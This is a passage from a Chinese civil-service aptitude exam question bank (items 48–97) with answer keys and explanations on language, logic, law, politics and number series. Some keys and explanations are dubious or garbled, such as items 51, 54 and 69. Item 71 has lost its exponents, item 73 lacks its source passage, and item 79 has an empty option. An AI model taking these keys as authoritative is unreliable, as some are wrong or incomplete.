B:早晨空气中含有大量的二氧化碳

 

C:早晨公路上汽车太多,污染严重

 

D:早晨人们刚刚起床,不适宜在室外锻炼

 

答案:A

 

48 . 构建社会主义和谐社会,要按照()的原则,着力解决人民最关心、最直接、最现实的(),努力形成全体人民各尽其能、各得其所而又和谐相处的局面。

 

A:共同建设、共同享有,利益问题

 

B:共同建设、共同享有,个人利益问题

 

C:共建共享,共同致富问题

 

D:共同享有问题

 

答案:A。

 

49 . 改革开放以来,我国主要区域政策经历了不同的阶段:(1)以经济特区为中心的沿海地区优先发展阶段;(2)以缩小区域差距为导向的西部大开发阶段;(3)以浦东开发为龙头的沿江沿边地区重点发展阶段;(4)以区域协调发展为导向的共同发展阶段。这四个阶段按时间顺序排列应为()。

 

A:(1)(2)(3)(4)

 

B:(1)(3)(2)(4)

 

C:(2)(3)(1)(4)

 

D:(2)(1)(3)(4)

 

答案:我国主要区域政策经历了从点到线,再到面的发展轨迹,首先是优先发展沿海的经济特区,以其为中心向外辐射,然后是以浦东开发为龙头的沿江沿边地区重点,之后开发西部以缩小区域间的差距;再后是区域协调发展为导向的共同发展阶段。故选B。

 

50 . 管中窥豹:坐井观天

 

A:班门弄斧:按部就班

 

B:刻舟求剑:竹篮打水

 

C:言不由衷:口是心非

 

D:未雨绸缪:杞人忧天

 

答案:C。题目详解:题干中,管中窥豹和坐井观天都是比喻人目光短浅,只能看到事物的一部分,是近义词;C选项,言不由衷和口是心非,都是话不是从内心发出来的,即说的话不是出于真心实意,指心口不一,符合题干的逻辑关系,因此此题答案为C选项。

51 . 如果有人朝你开枪,最好的办法就是跳进泳池,只要半米多深的水,就能把子弹的速度降到非致命的程度。类似现象在宇宙中也会发生。对那些运动速度直逼光速的粒子,充斥在宇宙中的微波背景辐射就犹如一片稠密的海洋。一个粒子只要在其中穿行几亿光年,它的速度就会大幅度下降。 根据上述文字能够推出的是:( )

 

A:稠密的海洋可以减轻粒子的穿行速度

 

B:跳进泳池能够抵御子弹的致命袭击

 

C:微波辐射能缓冲穿行其间粒子的速度

 

D:在宇宙中穿行,粒子速度会大幅下降

 

答案:【答案】C。题目详解:概括类题目。根据文段“宇宙中的微波背景辐射就犹如一片稠密的海洋。一个粒子只要在其中穿行几亿光年,它的速度就会大幅度下降。”可知道C项正确,“半米多深”以下才可以抵御子弹的致命袭击,B项错误。排除。“在其中穿行几亿光年,它的速度就会大幅度下降”所以D项错误,排除。故选C。

 

52 . 依次填入下列各句横线处的词语,恰当的一组是( )。①科学家一直猜测,令耳鸣患者痛苦不堪的耳内噪音并非源于耳内,而是最初产生于大脑内部。德国科学家日前________了这一猜测,并有望据此开发出治疗耳鸣的新疗法。②________于汉至六朝时期的造船业和制瓷业是长沙经济的两大杰出成就。③一项由国际计算机安全协会所公布的结果显示,电子邮件跃升为计算机病毒最主要的传播________。

 

A:证明,发端,媒体

 

B:证实,发源,媒体

 

C:证实,发端,媒介

 

D:证明,发源,媒介

 

答案:C。题目详解:“证实”指的是证明其确实,“证实猜测”、“证实传闻”是固定搭配;“发端”指的是一个过程或一连串的事件的开端、创始,用在这里指造船业和制瓷业的开端和开始是合适的;“媒介”指的是介绍或导致双方发生关系的人或事物,“传播媒介”是固定搭配,因此选C

 

53 . 1983年沃伦和马歇尔发现人的胃内有幽螺菌(HP),并分离培养成功,为常见的胃病病因和诊治作出了划时代的贡献。世界上约:l/3人口感染HP,我国感染率较高,儿童50%以上,成人约70%以上。HP主要通过口口传播,也可经中介物如餐具,牙具或患者排泄物污染他人的手或食物从而导致感染。防止儿童感染HP,在防止青少年胃病,促进儿童健康成长和社会公共卫生等方面都有重大意义。 根据以上论述,以下除________________以外,均可有效防止儿童感染HP。

 

A:改变大人口嚼食物喂养幼儿的习惯

 

B:注意补充维生素

 

C:大人小孩分床睡

 

D:提倡分食或使用公筷公勺

 

答案:【答案】B。题目详解:题干中介绍了儿童感染HP的几种途径:一是口口传播.二是经中介物如餐具,牙具或患者排泄物污染他人的手或食物从而导致感染。A项是防止第一种途径的传播,C,D项是防止第二种途径的传播,B项在材料中未提及。

 

54 . 55,15,35,55,75,95,( )

 

A:115;

 

B:116;

 

C:121;

 

D:125

 

答案:答案A,115。减第一项:-40,-20,0,20,40,(60)等差 故()=60+55=115

 

55 . 蝴蝶效应原本是一个气象学名词,说的是南美的蝴蝶扇动一下翅膀,最终将会在北美引起一场龙卷风。听起来这事似乎有些荒唐,但实际情况就是这样。一件微乎其微的细节,却可能造成一个谁都意想不到的结果。聪明的人,就应该从蝴蝶效应中及时看出日后的风暴。 可以印证这段话论点的文句是()

 

A:勿以恶小而为之,勿以善小而不为

 

B:尺有所短,寸有所长;物有所不足,智有所不明

 

C:不登高山,不知天之高也;不临深溪,不知地之厚也

 

D:不经一番寒彻骨,怎得梅花扑鼻香

 

答案:A。题目详解:<暂无>

 

56 . 据宪法,下列哪个领导人或机关或组织必须向全国人民代表大会报告工作?( )?

 

A:中华人民共和国主席?

 

B:.中央军委主席?

 

C:全国人大常委会?

 

D:中国人民政治协商会议?

 

答案:C。解析:《宪法》第69条规定:“全国人民代表大会常务委员会对全国人民代表大会负责并报告工作”。其余各项均无向全国人大报告工作的法定义务。所以选C。

 

57 . 近些年中国的经济发展速度是举世瞩目的,而这种高速发展也同时带了贫富差距的增大。刚刚脱离了计划经济的中国人心理能承受这种贫富差距的突然增大吗?中国社会用空前的稳定回答了这一问题。事实是,一方面,相对贫困虽然在增加,但大多数人的生活水平在大幅提高。另一方面,我们政府在缩小贫富差距方面的努力也是有目共睹的。 这段文字主要支持的一个观点是:( )

 

A:中国社会是空前的稳定的,刚刚脱离了计划经济的中国人心理能承受贫富差距的突然增大。

 

B:近些年中国的经济发展速度是举世瞩目的,中国社会是空前的稳定的。

 

C:大多数人的生活水平在大幅提高和政府在缩小贫富差距方面的努力使中国人心理能够承受现在贫富差距的突然增大。

 

D:事实是,大多数人的生活水平在大幅提高,我们政府在缩小贫富差距方面的努力也是有目共睹的

 

答案:C。题目详解:这段文字首先简要介绍了中国经济的现状,通过一个问句摆出了事实,即“中国人心理能够承受现在贫富差距的突然增大”,继而深入论述了这样的事实。明显的,这段文字是要表明:中国人能且为什么能在心里上承受贫富差距的突然增大。A选项较为片面,仅说出了中国人能承受贫富差距的增大。B选项对文意理解出现了偏差,没有说出这段文字的中心。D选项也片面,仅说出了为什么中国人能承受贫富差距的增大。

 

58 . 运动:增强:体质

 

A:政府:宏观:管理

 

B:企业:利润:工资

 

C:市场:计划:资源

 

D:篝火:驱逐:寒冷

 

答案:运动可以增强体质;篝火可以驱逐寒冷。故答案选D。

 

59 . 有专家担心转基因作物可能对环境有危险。比如在美国栽种的那种能抗虫害的玉米和棉花,可能加快出现一些更难对付的害虫。这类作物的所有分子都分泌出一些微量的“杀虫药”,一种像任何一种农药一样能选择杀死某些害虫的“雾剂”。 对这段话理解正确的一项是( )。

 

A:新害虫的出现与能抗虫害作物分泌的“雾剂”污染环境有关

 

B:美国的转基因玉米和棉花品种是无法对付害虫的

 

C:能抗虫害的作物可能促使更难杀死的害虫出现

 

D:能抗虫害的作物,在抗虫害的同时,又保护了一些害虫

 

答案:C。题目详解:从原文第一句“比如在美国栽种的那种能抗虫害的玉米和棉花,可能加快出现一些更难对付的害虫”可判断C正确。A项无中生有,原文中未涉及“污染环境”的内容,排除。B项混淆是非,文段中已说明美国栽种的玉米和棉花是能抗虫害的,排除。D项错误,“可能加快出现一些更难对付的害虫”不等于“保护害虫”。

 

60 . 随着人类使用有机燃料的数量逐步增加,排入大气中的温室气体也越来越多。这些温室气体包括二氧化碳、甲烷、水蒸气、臭氧、氟利昂等。有关资料显示,最近35年间,大气中的二氧化碳含量增加了32.3%。最近35年间,地球的平均气温达到15.3摄氏度,比工业化以前提高了0.7摄氏度。这一趋势不改变,人类的生存将面临严重威胁。下列不属于“这一趋势”范围的是( )。

 

A:人类使用有机燃料的数量增加

 

B:大气层中的温室气体越来越多

 

C:地球的平均气温越来越高

 

D:大气层中的二氧化碳含量增加

 

答案:A。题目详解:本题属于词句理解,主要考察局部精读类,本题对应的解法是该段文字主要是讲的是随着人类使用有机燃料的数量增加,产生了一系列负面效果,如果这些负面效果得不到控制的话,将会使人类生存面临严重威胁,故B、C、D三项都是属于需要改变的“这一趋势”。所以,本题选择A答案。

61 . 在深刻变化的社会转向期,思想观念多样多元多变,一些领域道德______,一些社会成员人生观、价值观扭曲,这是文艺工作者必须面对的时代_______;如何实现文艺的社会价值,净化心灵,烛照前行,这是文艺工作者必须回答的时代_______。 填入话横线部分最恰当的一项是:

 

A:失当,背景主题

 

B:缺失,环境,议题

 

C:失范,场景命题

 

D:缺乏境况问题

 

答案:C。题目详解: “道德”一般与“失范”搭配,且第三个空只能填“命题”或“问题”,从题干语体色彩看,也应填“命题”。故选C。

 

62 . (1)一辆卡车与一辆轿车相撞(2)卡车司机被拘留(3)轿车的保险杠被撞弯(4)轿车司机被送到医院急救(5)轿车司机没有系安全带

 

A:1-5-3-4-2

 

B:1-3-4-2-5

 

C:5-1-3-4-2

 

D:5-1-3-2-4

 

答案:A。题目详解:由题意知,本题述说了一起交通事故发生的前因后果,依据一般的逻辑顺序,由于两车相撞,而轿车司机没有系安全带,轿车保险杠被撞弯了,结果轿车司机受伤被送往医院,卡车司机被拘留。因此选A。

 

63 . “义利之辩”是我国古代伦理学上争论激烈的一个问题,争论的实质是把什么作为判断事物价值的标准。下列话语中主张以“利”作为判断事物价值的标准的是()。

 

A:君子谋道不谋食,君子忧道不忧贫

 

B:仓廪实则知礼节,衣食足则知荣辱

 

C:君子喻于义,小人喻于利

 

D:己欲立而立人,己欲达而达人

 

答案:义:公正合宜的道理;合乎正义或公益。利:利益、利润。从两个字的解释上便可知道“义”“利”作为判断失去价值的标准之间的区别。而选项A、B、C、D中,只有B项强调了“仓廪实”“衣食足”,这些都与“利”有关,其他几项强调的是“道”,故选B。

 

64 . 艺术家所寻求的是勤奋、认真甚至艰难地独立工作,以期作品能够产生作用。对我来说,今天社会所发生的一切是我们以各种方式来看待和感知的伟大变革。这种转变与人们的心理态度有关,代表着思考方式和意识形态中的诸多变化。无数因素带来影响,首先关注传统价值观的缺失以及传统所占据的份额。许多年轻人,我主要指的是继我之后的一代人,根本没有考虑过过去。此外,他们甚至不需要忘记它,因为他们并不了解。说这段话的人想要说明的是()。

 

A:艺术家如何使自己的作品产生作用。

 

B:我们以各种方式来看待和感知。

 

C:年轻人缺少对过去的了解。

 

D:现代社会对传统价值观的影响。

 

答案:答案:C.解析:“首先关注传统价值观的缺失以及传统所占据的份额”这句话可以揭示文段主旨,说这段话的人想要指出的是年轻人对过去的忽视,所以本题应当选择C

 

65 . 李某年龄16周岁,接受叔叔遗赠的10万元,靠此款丰衣足食,李某()。?

 

A:为完全民事行为能力人?

 

B:视为完全民事行为能力人?

 

C:为限制民事行为能力人?

 

D:为无民事行为能力人?

 

答案:C。解析:《中华人民共和国民法通则》第十一条第二款规定,十六周岁以上不满十八周岁的公民,以自己的劳动收入为主要生活来源的,视为完全民事行为能力人。第十二条第一款规定,十周岁以上的未成年人是限制民事行为能力人,可以进行与他的年龄、智力相适应的民事活动;其他民事活动由他的法定代理人代理,或者征得他的法定代理人的同意。据此,可以看出李某属于限制民事行为能力人。

 

66 . 据一份资料统计,日本每年约有5000名老人自杀,占自杀人数的3/10,称得上世界“老人自杀大国”。而其中离婚男性的自杀率为有配偶者的8倍,离婚女性自杀率为有配偶者的4倍。 这段话直接支持的观点是( )。

 

A:日本老人经济负担重,生活压力很大

 

B:自杀者多半患有老年性精神病

 

C:鳏寡孤独是日本老人自杀的一个重要原因

 

D:在日本,老年离婚的现象较普遍

 

答案:C。题目详解:本题属于观点态度题型,主要考察推断类中的劝导说服类,本题对应的解法是从原文“离婚男性的自杀率为有配偶者的8倍”,“离婚女性自杀率为有配偶者的4倍”,可见“鳏寡孤独是造成日本老人自杀的一个重要原因”。A、B选项是无中生有,D项不是作者观点所在,文段主要是对日本老年自杀的现象的阐述。所以,本题选择C答案。

 

67 . 某市工商局以大华贸易公司倒卖化肥为由,决定对该公司罚款7万元,同时对该公司王经理罚款800元。大华公司和王经理对该处罚决定都不服而向法院起诉。大华公司和王经理的诉讼地位是()。

 

A:共同原告

 

B:大华公司为第三人

 

C:王经理为第三人

 

D:由大华公司与王经理协商

 

答案:A。

 

68 . 下列语句中,有语病的一句为()。

 

A:剑桥大学材料科学教授林·汉弗莱认为,只要解决了芯片与大脑的接口问题,把刻在微型芯片上的微型记忆电路加入大脑中的设想就完全有可能变为现实。

 

B:病毒的生存能力既然这么弱,为什么还会那样猖獗呢?

 

C:旨在培养中小学生爱国热情的德育打卡制度,由于一些单位和个人的认识问题,出现“走过场”现象,的确让人叹息。

 

D:不久前,中国社科院等发布的《中国城市智慧低碳发展报告》,深圳因其经济、能源、设施、环境和社会等方面的成绩,在110座城市中位列前三。

 

答案:D。题目详解:D项句子前后主语不一致,且“位列前三”词语使用不当,应改为“中国社科院等发布的《中国城市智慧低碳发展报告》显示,深圳……位列第三”。因此,本题答案为D选项

 

69 . 人与自然和谐发展首先就是要遵循自然规律,其原因在于()。

 

A:人类始终是自然界的一部分,人类永远不能征服自然

 

B:生产发展,生活富裕之后,人们需要一个良好的生态环境

 

C:如果违背自然规律,过度掠夺自然资源,破坏自然环境,就会遭到自然界的报复

 

D:自然规律可以因人的意识发生局部性的更改

 

答案:A。自然规律不可更改,且人也是自然的一部分。因此在人与自然和谐发展的过程中要首先明确这一点。故选A。

 

70 . 危害国家安全的案件由(  )人民法院管辖。

 

A:基层

 

B:中级

 

C:高级

 

D:最高

 

答案:B[解析]我国《刑事诉讼法》第二十条规定:“中级人民法院管辖下列第一审刑事案件:(一)反革命案件、危害国家安全案件;(二)可能判处无期徒刑、死刑的普通刑事案件;(三)外国人犯罪的刑事案件。”

71 . 5,10,26,65,145,( )

 

A:197;

 

B:226;

 

C:257;

 

D:290;

 

答案:选D,思路一:5=22+1,10=32+1,26=52+1,65=82+1,145=122+1,290=172+1,思路二:三级等差

 

72 . 在向南方雪灾受灾地区的捐款活动中,某慈善组织收到一笔10000元的匿名捐款,该组织经过调查,发现是甲、乙、丙、丁四个人当中的某一个捐的。慈善组织成员对他们进行求证时,发现他们的说法相互矛盾:甲说:对不起,这钱不是我捐的。乙说:我估计这钱肯定是丁捐的。丙说:乙的收入最高,肯定是乙捐的。丁说:乙的说法没有任何根据。假定四人中有一个说了真话,那么到底谁是真正的捐款者呢?

 

A:甲

 

B:乙

 

C:丙

 

D:丁

 

答案:A。根据直言命题的矛盾关系解题。题干中乙和丁的话互为矛盾,则必有一真一假,根据题意只有一个人说了真话。则甲和丙说的都是假话。由甲的话为假可得出甲是捐款者。

 

73 . 根据文意,下列有关“随机取样”的说法不正确的一项是( )

 

A:市场调查中常常采用这种方法

 

B:学术研究有些需用该方法有些则不需

 

C:媒体常常使用些方法因而误导了大众

 

D:人体生物学研究很少采用这种方法

 

答案:C。题目详解:文段首句“现在媒体对随机取样、样本代表性等概念备加关注。这种关注导致许多人错误地认为”可以得出误导大众的是媒体对随机取样概念的关注,并不是对随机取样这一方法的作用,C项曲解文意。

 

74 . 法律并不只是解决纠纷的手段,它也是传达意义的符号。换言之,法律是安排社会生活和解决社会问题的工具和手段,也是特定人群价值追求的某种显现,归根到底,法律是人创造出来的具有某种功能的“技术手段”,人对于世界的反应最终必须借助于文化这一中介。 这段文字主要讨论的是( )。

 

A:法律的根本精神

 

B:法律的最高价值

 

C:法律的基本功能

 

D:法律的绝对作用

 

答案:A。题目详解:在文中提到“法律是特定人群价值追求的某种显现”,并未提到法律的最高价值,故排除B。文中提到“法律是人创造出来的具有某种功能的‘技术手段’”,并不是指法律的基本功能,故排除C。选项D法律的绝对作用文中也未提及。从文中“也是”“归根到底”等关联词可以看出其后的语句是文段欲强调的内容,而“传达意义的符号”“人对于世界的反应最终必须借助于文化这一中介”这两句话从文化的角度阐释法律,是法律的精神所在,因此选项A为正确答案。

 

75 . 在公共汽车上,一个人张大嘴打了个哈欠,他周围会有几个人也忍不住打起了哈欠。有些人不打哈欠是因为他们受暗示性不强。哪些人受暗示性强呢?可以通过一个简单的测试检查出来。让一个人水平伸出双手,掌心朝上,闭上双眼。告诉他现在他的左手上系了一个氢气球,并且不断向上飘;他的右手上绑了一块大石头,向下坠。三分钟以后,看他双手之间的差距,距离越大,则暗示性越强。 这段文字说明的主要是:( )

 

A:人常常迷失在自我当中,形成一定程度的从众心理

 

B:人很容易受到来自外界信息的暗示,从而出现自我知觉的偏差

 

C:人很容易相信一个笼统的、一般性的人格描述特别适合他

 

D:在日常生活中,人不可能总把自己放在局外人的地位来观察自己

 

答案:B。题目详解:这段文字主要讲的是人受外界信息暗示性的问题。第一二句从打哈欠的事例出发,引出了受暗示性的说法。第三句之后通过一个实验来测试个体受暗示性的强弱。A项说“从众心理”,文中谈的是“受暗示性”,排除。C、D项内容都与文段无关,排除。本题的正确答案为B。

 

76 . 中国妇女发展基金会将委托专业金融机构对中国女足发展基金进行________和________,其收益部分用于________中国女子足球队改善生活和训练条件,开展交流与合作,培养选拔后备力量。 依次填入以上段落中三个划横线处的词语,最恰当的一组是( )。

 

A:管理 运作 资助

 

B:经营 运作 援助

 

C:管理 使用 资助

 

D:经营 使用 援助

 

答案:A。题目详解:基金是用来“管理”的而非“经营”,由此可排除B、D两项。“运作”指运行和操作,指进行中的工作状态。与“使用”相比更加符合句意,且“基金的管理和运作”也属于固定搭配。故正确答案为A。

 

77 . 关于地方行政机关的派出机关和派出机构的设立,下列说法不正确的是()。

 

A:行政公署是省、自治区人民政府设立的派出机关,其设立须经国务院批准

 

B:区公所是县、自治县人民政府设立的派出机构,其设立须经省、自治区、直辖市人民政府的批准

 

C:街道办事处是市辖区和不设区的市的人民政府设立的派出机关,其设立须经上级人民政府批准

 

D:中国人民银行的分支机构是中国人民银行的派出机构,根据中国人民银行的授权,维护本辖区的金融稳定,承办有关业务

 

答案:B。解析:派出机关是由有权地方人民政府在一定行政区域内设立,代表设立机关管理该行政区域内各项行政事务的行政机构。根据《地方各级人民代表大会和地方各级人民政府组织法》第68条的规定,派出机关有三类:省、自治区人民政府设立的派出机关——行政公署,设立须经国务院批准;县、自治县的人民政府设立的派出机关——区公所,设立须经省、自治区、直辖市的人民政府批准;市辖区、不设区的市的人民政府设立的派出机关——街道办事处,设立须经上一级人民政府批准。B项,区公所应是派出机关,故错误。答题时应注意细微处的陷阱。派出机构是由有权地方人民政府的职能部门在一定行政区域内设立,代表该设立机构管理该行政区域内某一方面行政事务的行政机构,主要是根据部门行政法的规定设立并赋予行政职权。部门行政法根据有关行政领域的具体情况对派出机构的设置和职权作出规定。《中国人民银行法》第13条规定,中国人民银行根据履行职责的需要设立分支机构,作为中国人民银行的派出机构。中国人民银行的分支机构根据中国人民银行的授权,维护本辖区的金融稳定,承办有关业务。因此,D项分析正确,故本题应选B。

 

78 . 人生的奥妙就在于与人相处,和聪明的人在一起,你才会更加睿智;和优秀的人在一起,你才会________。

 

A:一鸣惊人

 

B:脱颖而出

 

C:出人头地

 

D:出类拔萃

 

答案:D。题目详解:所填的词语应与“优秀”构成递进关系,即语义比“优秀”更重。“一鸣惊人”比喻平时没有特殊的表现,一干就有惊人的成绩;“脱颖而出”比喻人的才能全部显示出来。从词义可知,这两个成语都不合要求,排除AB。“出人头地”指德才超众或成就突出,超出一般人,高人一等;“出类拔萃”指超出同类。这两者意思相近,但前者语义过重,排除C,选D。

 

79 . 科学发展观是立足(  ),总结我国发展实践,借鉴国外发展经验,适应新的发展要求提出来的。

 

A:社会主义初级阶段基本国情  当前我国发展的阶段性特征

 

B:解决环境资源问题

 

C:全面建设小康社会的实践

 

D:

 

答案:【答案】A。解析:******同志在十七大报告中指出,科学发展观,是立足社会主义初级阶段基本国情,总结我国发展实践,借鉴国外发展经验,适应新的发展要求提出的重大战略思想。

 

80 . 扩大内需主要指扩大民间消费,也就是说,要提高民间消费在经济增长中的作用。扩大投资可以扩大需求,扩大政府消费也能够扩大需求,但是与扩大民间消费相比,二者都有一定的限制条件,且副作用大,历史经验已经证明了这一点。 对于文意的理解正确的一项是:( )

 

A:政府消费不利于扩大内需

 

B:扩大投资不利于扩大内需

 

C:历史经验证明扩大内需副作用大

 

D:扩大民间消费是扩大内需的重要措施

 

答案:D。题目详解:文章比较扩大民间消费与扩大政府消费、扩大政府投资对扩大内需的作用对比,扩大民间消费作用最大。

81. 赞成文理分科的理由是“术业有专攻”,下面直接对此进行批驳的一项是( )

 

A:文理学科画地为牢,孤芳自赏

 

B:就像一幢大厦一样,知识体系也由诸多支点构成,它们各自独立却又暗通款曲,相互分担压力,刺激彼此的想象力

 

C:人为将重心置于一点,或许带来投机式的胜利,却最终可能招致知识体系内在生机的干涸

 

D:诚如朱永新所言,文理分科导致了中国教育科学精神和人文情怀的离间

 

答案:B。题目详解:“暗通款曲,相互分担压力,刺激彼此的想象力”说明知识体系间是互有联系的,而并非所谓的“术业有专攻”,因此选B。

 

82 . 磁带:录音机

 

A:存储卡:手机

 

B:光驱:电脑

 

C:数字电视:机顶盒

 

D:电话号码:通讯录

 

答案:【解析】A。通过录音机可以录制和播放磁带中的内容,通过手机可以写入或者读取存储卡中的内容。

 

83 . 饮食偏好和进餐模式在人的儿童阶段已形成,而儿童时代的食品选择和饮食习惯将会对人的一生造成重要的影响。收集的证据显示,在2至11岁儿童对食物和饮料的偏好和购买“要求”,对于他们的消费习惯同样产生不小的影响。目前的食品和饮料的构成和电视上狂轰滥炸般的儿童食品广告给儿童的长期身体健康带来很大危险。 通过这段文字可看出作者的主要观点是( )。

 

A:儿童要养成良好的饮食习惯

 

B:儿童时代的食品选择和饮食习惯会影响一生

 

C:视广告会影响儿童的偏好和购买“要求”

 

D:垃圾食品电视广告会影响儿童健康

 

答案:【答案】D。题目详解:本题属于观点态度题型,主要考察推断类中的劝导说服类,本题的对应的解法是通过寻找中心句或关键词,题干指出“饮食偏好和进餐模式在人的儿童阶段已形成”,而目前食品和饮料的构成和电视节目的影响将给儿童健康带来很大的危害,所以,本题答案为D选项

 

84 . 道德是一定的主客观条件的产物,它产生于()。

 

A:自我意识

 

B:生产关系

 

C:生产实践

 

D:科学实验

 

答案:首先,社会关系的形成是道德赖以产生的客观条件。其次,人类自我意识的形成与发展是道德产生的主观条件。道德产生所需要的主观条件和客观条件统一于生产实践。敝选C。

 

85 . 中共中央政治局3月28日召开会议,讨论研究加强市、地、州、盟党政正职干部管理工作。中共中央总书记胡锦涛主持会议。会议认为,()一级在党和国家工作全局中处于承上启下的重要位置,该级党政正职干部是党治国理政的重要骨干力量,在推进改革发展稳定中担负着重要责任、发挥着关键作用。

 

A:省市

 

B:地市

 

C:县市

 

D:乡镇

 

答案:中共中央政治局3月28日召开会议,讨论研究加强市、地、州、盟党政正职干部管理工作。中共中央总书记胡锦涛主持会议。会议认为,地市一级在党和国家工作全局中处于承上启下的重要位置,该级党政正职干部是党治国理政的重要骨干力量,在推进改革发展稳定中担负着重要责任、发挥着关键作用。

 

86 . (四川)下列句子中,有语病的一项是:( )。

 

A:篮球巨星奥尼尔深受广大球迷所欢迎,因为他不仅球艺精湛,而且很幽默,给球迷们带来了很多快乐。

 

B:一篇文章只有当它不仅能够给人以心智的启迪,也能够给人以美的陶冶的时候,才能算是一篇好文章。

 

C:衡量一个社会文明程度的标尺在于看它在多大程度上、多大的范围内为个人自由充分的发展提供可能。

 

D:人们的内心都有漂泊的冲动和流浪的向往,渴望新鲜的感受和生命的奇遇,这是自由探索的力量源泉。

 

答案:A。题目详解:“受……欢迎”是常用的表被动的结构,“所”字赘余,应删去。故A为正确答案。

 

87 . 东北某市一建筑工地在施工中,将埋藏在地下的装有有毒物质的罐体损坏,导致罐内有毒物质泄漏,附近居民发生大面积中毒事件。那么,有关部门应如何处理?()?

 

A:人民政府应当组织专家对中毒事件进行评估,提出是否启动突发事件应急预案的建议?

 

B:如果启动本行政区域的应急预案,应由省卫生行政主管部门决定,并向省人民政府报告?

 

C:如果启动本行政区域的应急预案,由省人民政府报国务院批准后实施?

 

D:如果启动本行政区域的应急预案,由省人民政府决定。并向国务院报告?

 

答案:D。?解析:《突发公共卫生事件应急条例》第二十六条规定:“突发事件发生后,卫生行政主管部门应当组织专家对突发事件进行综合评估,初步判断突发事件的类型,提出是否启动突发应急预案的建议。”第二十七条规定:“省、自治区、直辖市启动突发事件应急预案,由省、自治区、直辖市人民政府决定。并向国务院报告。”所以,只有D项的说法正确。?

 

88 . 庄子和惠子一道在濠水的桥上游玩。庄子说,白鯈鱼游得多么悠闲自在,这就是鱼儿的快乐。惠子曰:“子非鱼,安知鱼之乐?”庄子曰:“子非我,安知我不知鱼之乐?”下列选项中,与上面的对话最为相似的是( )。

 

A:“你为什么不去送行?”“你怎么知道我没有去呢?”

 

B:“你怎么负的伤?”“我怎么回忆得起当时的情况呢?”

 

C:“你为什么到军事禁区里来?”“难道我不能到这里来看看吗?”

 

D:“唐玄宗到这里来烧过香,你有什么证据?”“你有什么证据说唐玄宗没来这里烧过香?”

 

答案:【答案】D。题目详解:惠子与庄子对话的意思是:“你不是鱼,怎么能知道鱼的快乐呢?”“你不是我,怎么知道我不知道鱼的快乐呢?”根据问话者和回答者之间对话的关系来看,选项D的对话与之最为相似。

 

89 . 留学异国的人常有“边缘人”的苦闷。人们显然不可能在进入一块陌生国土的同时, 就在一瞬间也加入它的文化,而原来的文化背景又会由于天长地远而渐渐疏离。在实际生活中,两种______的文化,会经常骤然直率地在我们面前相遇、碰撞,一开始真有无所适从亦无可躲避的______。依次填入划横线部分最恰当的一项是:

 

A:水火不融尴尬

 

B:截然不同窘迫

 

C:南辕北辙狼狈

 

D:针锋相对失落

 

答案:B。题目详解:第一空填入的成语要体现两种文化的不同,四个成语均能体现这一点,但是水火不融、针锋相对语气过强,而南辕北辙指的是行动和目的正好相反,用在此处不合适。第二个空体现的是陷入一种较困急的处境,显然窘迫更加合适。

 

90 . ( )一个人,首先要看他的思想道德水平,其次再看他的文化和其他各方面的素质。 填入括号内的词语,最恰当的一项是( )。

 

A:评论

 

B:评价

 

C:估计

 

D:评估

 

答案:B。题目详解:首先排除C、D。评价:评定价值的高低或者评定的价值。评论:批评或议论。

91 .  体育是适应人类生产、军事和健康等需要而发展起来的一项活动。现代奥林匹克运动的兴起,使体育精神进一步国际化,但同时由于商业运作和利益驱使成份的增多,在某些方面,体育也开始背离初衷。不可否认,体育很难脱离开社会背景而发展,但更为重要的是,体育是人类社会追求进步的一种象征,一旦违背了这一意愿,体育对人类的作用会减弱,最终将失去其存在和发展的必要。 这段话支持的主要观点是:( )

 

A:体育是人类重要的社会活动,因而发展体育不能违背这一重要初衷

 

B:现代体育的发展有可能导致体育自身的消亡

 

C:体育的发展要为人类自身的进步做贡献

 

D:体育对人类的作用因现代体育的发展而减弱

 

答案:C。题目详解:文段首先介绍了体育随着时代的发展而产生的变化,即“使体育精神进一步国际化,在某些方面,体育也开始背离初衷。”最后以表示强调的“更为重要的是”引出作者个人的观点,即体育不应违背它促使人类社会追求进步这一属性。故本题正确答案为C

 

92 . 社会主义制度的巩固,社会主义事业的发展,只能是两个文明同时建设,互相促进的结果。________两手都硬起来,________两个文明一起上;单有一手硬,________可能有一时的效果,________最终两个文明建设都上不去。 ( )

 

A:既然,就能,也,而

 

B:只要,就能,即使,反而

 

C:因为,所以,尽管,可

 

D:只有,才能,虽然,但

 

答案:D。题目详解:“两手都硬起来”是“两个文明一起上”的必要非充分条件,用“只有……才能……”合适。后一分句是转折关系复句,用“虽然……但……”合适。故正确答案为D项

 

93 . 下列对沙尘暴的解释,最准确的一项是()。

 

A:沙尘暴是由于风将大量沙尘卷起,使空气混浊,能见度小于千米的风沙现象

 

B:沙尘暴是雕塑大地外貌的自然力之一,是大自然保持全球生态平衡的一项工程

 

C:从地质史上看,沙尘暴是风力对草原带的风化物质进行筛选分类的结果

 

D:沙尘暴是那些颗粒适中的粗砂和细砂被大风吹移到附近就地聚集成沙漠形成的

 

答案:A。题目详解:根据文中“……沙尘暴,即由于强烈的风将大量沙尘卷起,造成空气混浊,能见度小于千米的风沙天气现象”,可知A项就是对沙尘暴的解释。故本题答案为A

 

94 . 我们一定要坚持原则,对于达不到质量标准的产品,就不能________,否则,对国家对人民会造成不应有的损失。填入画横线部分最恰当的一项是( )。

 

A:接受

 

B:接纳

 

C:接收

 

D:接手

 

答案:C。题目详解:“接收”指的是接纳、收受,且多用于官方的说法,所以本题选C

 

95 . 第三次科技革命开始于()

 

A:18世纪60年代

 

B:19世纪70年代

 

C:20世纪40年代

 

D:20世纪70年代

 

答案:C

 

96 . 锆石极耐高温,其熔点达2750℃,并耐酸腐蚀。世界上有80%的锆石直接用于铸造、陶瓷、玻璃工业以及制造耐火材料。少量的锆石用于铁合金、医药、油漆、制革、磨料、化工及核工业。极少量的锆石用于冶炼金属锆。含ZrO265%—66%的锆石英砂因其耐熔性(熔点2500℃以上)而直接用作铸造厂铁金属的铸型材料。 这段话的主要目的是告诉我们( )。

 

A:锆石极耐高温

 

B:锆石的工业用途

 

C:锆石耐酸腐蚀

 

D:锆石性质特殊

 

答案:B。题目详解:本题属于寓意启示题型,主要考察推断类中的劝导说服类,本题对应的解法是识别陷阱类型中的推断不当。选项A、C、都是属于锆石的性质特征,是并列关系。都应排除。D项,文段主要是对锆石的在工业上用涂的阐述而非性质,且D项包含了A、C项的内容。所以,本题选择B答案。

 

97 . 将10克盐和200克浓度为5%的盐水一起加入一杯水中,可得浓度为2.5%的盐水,则原来杯中水的克数是()。

 

A:570

 

B:580

 

C:590

 

D:600

 

答案:C。

 

